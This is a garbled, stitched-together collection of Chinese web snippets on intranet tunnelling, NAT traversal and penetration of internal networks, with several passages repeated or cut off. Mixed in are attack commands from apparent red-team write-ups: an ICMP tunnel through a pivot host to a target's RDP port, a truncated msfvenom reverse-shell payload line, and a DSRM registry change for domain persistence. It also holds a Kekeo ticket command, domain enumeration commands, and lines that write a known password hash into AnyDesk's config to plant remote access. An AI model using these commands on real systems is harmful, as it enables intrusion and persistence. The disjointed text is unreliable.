、ICMP隧道、GRE隧道 传输层:TCP隧道、UDP隧道、常规端口转发 应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道 内网连通性 判断内网连通性是指判断机器是否能上外网,在判断时要综合判断各种协议 常见的允许流量流出的端口有80、8080、443、53、110、123等,常用的内网连通性判断方法如下: ICMP协议 执行命令"ping <IP地址或域名>",如下图所示: TCP协议 netcat dig nslookup是windows操作系统自带的DNS探测命令,其用法如下所示: dig是Linux默认自带的DNS探测命令,其用法如下所示: 代理服务器 还有一种情况是流量不能直接流出,需要在内网中设置代理服务器 ,常用于通过企业办公网段上网的场景,常用的判断方法如下: 查看网络连接,判断是否存在与其他机器的8080(不绝对)等端口的连接(可以尝试运行"ping -n 1 -a ip "命令) 查看内网中是否有主机名类似于 IPv6报文的封装方式的不同,IPv6 over IPv4隧道分为以下几种模式: IPv6隧道使用 目前支持IPv6的隧道工具有socat、6tunnel、nt6tunnel等,这里简单的介绍一下6tunnel
1、介绍 在内网中,如果攻击者使用 HTTP、DNS 等应用层隧道都失败了,那么或许可以试试网络层的 ICMP 隧道,ICMP 协议最常见的场景就是使用 ping 命令,而且一般防火墙都不会禁止 ping cd PingTunnel make && make install ptunnel 常用命令介绍: -p: 指定跳板服务器 IP 地址 -lp: 监听本地 TCP 端口 -da: 指定访问目标的内网 Kali 攻击机 172.16.214.6 (外网) | | Linux Web 跳板机 172.16.214.5 (外网) | 192.168.7.5 (内网 ) | | Win RDP 目标机 192.168.7.110 (内网) 在 Kali 攻击机上执行以下命令 ptunnel -p 172.16.214.5 -lp 1080 -da 192.168.7.110 -dp 3389 -x teamssix -p 指定跳板机外网IP -lp 指定本机的监听端口 -da 指定目标机的内网IP -dp 指定目标机的端口 -x 设置隧道密码 在 Linux
、ICMP隧道、GRE隧道 传输层:TCP隧道、UDP隧道、常规端口转发 应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道 内网连通性 判断内网连通性是指判断机器是否能上外网,在判断时要综合判断各种协议 常见的允许流量流出的端口有80、8080、443、53、110、123等,常用的内网连通性判断方法如下: ICMP协议 执行命令"ping <IP地址或域名>",如下图所示: TCP协议 netcat( dig nslookup是windows操作系统自带的DNS探测命令,其用法如下所示: dig是Linux默认自带的DNS探测命令,其用法如下所示: 代理服务器 还有一种情况是流量不能直接流出,需要在内网中设置代理服务器 ,常用于通过企业办公网段上网的场景,常用的判断方法如下: 查看网络连接,判断是否存在与其他机器的8080(不绝对)等端口的连接(可以尝试运行"ping -n 1 -a ip "命令) 查看内网中是否有主机名类似于 IPv6报文的封装方式的不同,IPv6 over IPv4隧道分为以下几种模式: IPv6隧道使用 目前支持IPv6的隧道工具有socat、6tunnel、nt6tunnel等,这里简单的介绍一下6tunnel
一、前言 2024年,中央网信办、国家发改委、工信部联合印发《深入推进IPv6规模部署和应用2024年工作应用》,文中提出到2024年末: IPv6活跃用户达到8亿; 物联网IPv6连接达到6.5亿; 固定网IPv6流量占比23%,移动网占比65%。 作者家庭也已经荣幸地接入了支持IPv6的公网带宽。socat 代替frp实现内网穿透能避免内存占用过高和减少性能开销。 二、准备工作 2.1 检测是否成功获取 IPv6 https://test-ipv6.com 获取本机IP 如果本机是windows通过cmd执行ipconfig命令获取本机IPv6地址 ipconfig /pf.sh 增加端口映射即可 我也会持续更新本脚本 安全建议 内网穿透RDP(远程桌面)和SSH服务前必须确保使用非弱口令,否则会导致内网设备被爆破。 数据无价请谨慎映射内网服务
内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。 内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。 因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。 192.168.10.10:22222 <——> 10000 当我们访问百度这个事情做完之后的一定时间内,Session记录就会在路由器的体内消失,这个10000端口可以继续分配给其他用户 那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过 内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!
内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。 内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。 因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。 那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过QQ通信。 内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!
Blog的管理员密码了,233 想起来我已经好久没有写文章了,于是来水一篇,因为这几天一直在研究废物利用,啊呸,一直在研究怎么把我吃灰的树莓派4B合理的运用起来,可是一时间居然想不起来该拿来干嘛,因为电信大内网的缘故 我们这里三网的移动数据都是带有公网IPV6的,但是我不怎么确定我的宽带有没有IPV6,毕竟我光纤猫一直都是用的路由模式,没有获得过IPV6,于是我开始了尝试: 你需要准备: 1.树莓派 2.网线 3 基础上适配树莓派的脚本 第一步:验证是否有公网IPV6 验证链接:http://www.test-ipv6.com/ 如果你的局域网已经有了公网IPV6,则: ? 如果有公网IPV6的话就进入第二步,如果没有的话请百度或者咨询运营商把光纤猫的连接模式改为桥接模式,然后重启看看有没有公网IPV6 第二步:配置树莓派 先说明,我这里是路由器不支持IPV6(家境贫寒), 用ipv6远程ssh 你只要用有ipv6的设备(手机移动数据基本都有IPV6)用ssh连接你的域名即可,像这样: ? OK,本期完结,写文章写了三个多小时,不留个评论鼓励下???
内网也指局域网,是指某一区域内由多台计算机互联而成的计算机组,组网的范围通常是数千米内。 ? ? 在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? ? 在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。 DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器 附带一份内网学习思维导图 ? ?
在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? 在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。 防火墙需要进行NAT 内网可以访问DMZ:此策略时用户可以使用或者管理DMZ中地服务器 外网不能访问内网:防火墙的基本策略,如需访问,通过V**的方式 外网可以访问DMZ:需要由防火墙来完成对外地址到服务器实际地址的转换 DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器 附带一份内网学习思维导图 ?
文章目录 使用自己的域名远程访问内网群晖NAS 6.X【内网穿透】 使用自己的域名远程访问内网群晖NAS 6.X【内网穿透】 在之前的文章中,我们向大家演示了如何使用cpolar,创建一条固定的、能够在公共互联网登录内网群晖 不过我们能看到,在公网登录内网群晖NAS时,使用的协议为http,而cpolar又支持自定义域名,那么我们完全可以更进一步,使用类似网址的域名,甚至为其加上现在流行的安全协议(https),让我们的数据更为安全 想要使用自定义域名作为登录内网群晖NAS的地址,那么我们需要先有一个域名,这个域名需要在公网使用,因此必须向域名供应商购买(购买域名的详细流程,请参见《使用cpolar建立一个商业网站(如何购买域名)》 虽然我们完成了公共互联网上内网群晖NAS域名的更新,但此时http协议还处于不安全状态,地址链接很容易被劫持,因此我们还需要升级至https协议,让我们的数据安全更有保障。 转载自cpolar极点云文章:使用自己的域名远程访问内网群晖NAS 6.X【内网穿透】
image.png 视频内容 内网渗透之内网隧道构建 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。
文章前言 随着企业信息化程度的加深,内网环境逐渐成为攻击者的关注的重点目标,在内网渗透的过程中权限维持是不可或缺的关键环节之一,它往往决定了攻击者能否在目标系统中长时间潜伏,获取敏感信息或者造成更大范围的破坏 system\currentcontrolset\control\lsa\" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD Step 6: Hash https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pkca/4e5fb325-eabc-4fac-a0da-af2b6b4430cb ,并且把DNS也代理进去(dns设置为内网的域控) Step 6:使用Kekeo获取用户的NTLM tgt::pac /subject:Al1ex /castore:current_user /domain ,其实内网主机有window,也有Linux,所以读者不用过于局限于内网手法进行权限维持(当然这种作为首选属实极好),至于window下的一系列维权也可以进行尝试操作,例如:WMI后门、CLR维权、COM
前言: 内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp。 (这里不讲配置的一些理论理解了,麻烦,大家可以百度内网穿透的理论知识) 我们需要生成一下木马文件 msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp
system\currentcontrolset\control\lsa\" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD 6、
查看域内的主机 net view/domain: XXX 4.查看域里面的组 net group/domain 5.查看域内所有的主机名 net group "domain computers" /domain 6. 即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现 IPC$入侵,即通过使用Windows系统默认启动的IPC$共享获得计算机控制权的入侵,在内网中及其常见
三、chisel隧道搭建 0x01 chisel进行ssh内网穿透 首先需要三台linux主机,在这里使用VPS作为chisel服务器端,然后使用kali作为内网主机,使用另一台主机作为我们的攻击者主机 socks代理,然后使用SocksCap等工具进行内网扫描或者内网渗透。 这就导致一个问题,如果我直接在VPS上执行完命令之后,默认监听127.0.0.1的1080端口,这样的话,我只能用VPS去访问内网主机,如果想要在win10上通过SocksCap设置代理访问内网是行不通的 socks流量实现对内网主机的访问。 (3):使用Socks代理访问内网 使用浏览器 ? ? 成功访问到内网的通达OA。 使用SocksCap进行内网访问 ? 代理搭建成功,流量可以正常进入内网。
红米AX6S路由器刷OpenWrt固件,实现软路由功能,科学-网速度起飞背景:有时候,我们开发过程中需要使用到内网穿透、需要科学一下。但是每次都需要启动客户端,感觉可麻烦了。 能不能把科学一下及内网穿透功能直接配置到路由器上呢?只要连接到这个wifi的就可以科学一下了。说搞就搞,买个小米AX6S路由器,搞起。配置好之后,真香!! 切换后,在凯哥提供的软件包中,有个ax6s文件夹,在这个文件夹下,有个factory.bin文件,将这个文件上传到tmp目录下。如下图:上传之后,最好在tmp目录下再确认下是否上传成功。 步骤七:刷入新固件在左侧菜单栏,找到系统>>备份/升级>>刷写新的固件固件文件,选择凯哥提供的软件包中,ax6s文件夹下的sys.bin选中后,点击刷入固件。刷写后,会弹窗验证界面。
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 某内网靶场的详细教程:Vulnstack(一) 内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解 实操部分写的比较草率,主要是为了增强认知 一个是为了保障安全(内网与外网相隔绝),另一个就是资源共享,毕竟大家都是一条船上的人。SMB 协议就是用于实现各种资源的共享的,其中就包括IPC连接中的命名管道。 利用场景: 已拿下内网中一台主机的权限(webserver),掌握该主机的域用户名和密码,知道域内其他用户名。
前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。 远程控制软件 向日葵篇 向日葵查看版本 向日葵(可以攻击) 针对向日葵的话其实如果有本地安装的话,是... 前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。 echo ad.anynet.pwd_hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c >> C:\ Users\用户目录\AppData\Roaming\AnyDesk\service.conf echo ad.anynet.pwd_salt=cb65156829a1d5a7281bfe8f6c98734a
无论是通过外网打点,还是水坑钓鱼,进入内网后的第一步,也是最重要的一步就是信息收集,而且信息收集往往是一直穿插在整个内网渗透过程中。 查当前机器的机器名,知道当前机器是干什么的hostname4.查看在线用户,注意管理员此时在不在quser / query user5.查当前机器中所有的用户名,开始搜集准备用户名字典net user6. %I | findstr "TTL=" >> pinglive.txt 扫描的话建议直接在内网进行扫描,速度和准确率都比较有保障。 B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E6%B4%BB%E5%8A%A8%E7%9B%AE%E5%BD%95%E4%BF%A1%E6%81%AF%E7%9A%84%E8%8E 端口识别 扫描内网中同时开放389和53端口的机器。 端口:389服务:LDAP、ILS说明:轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。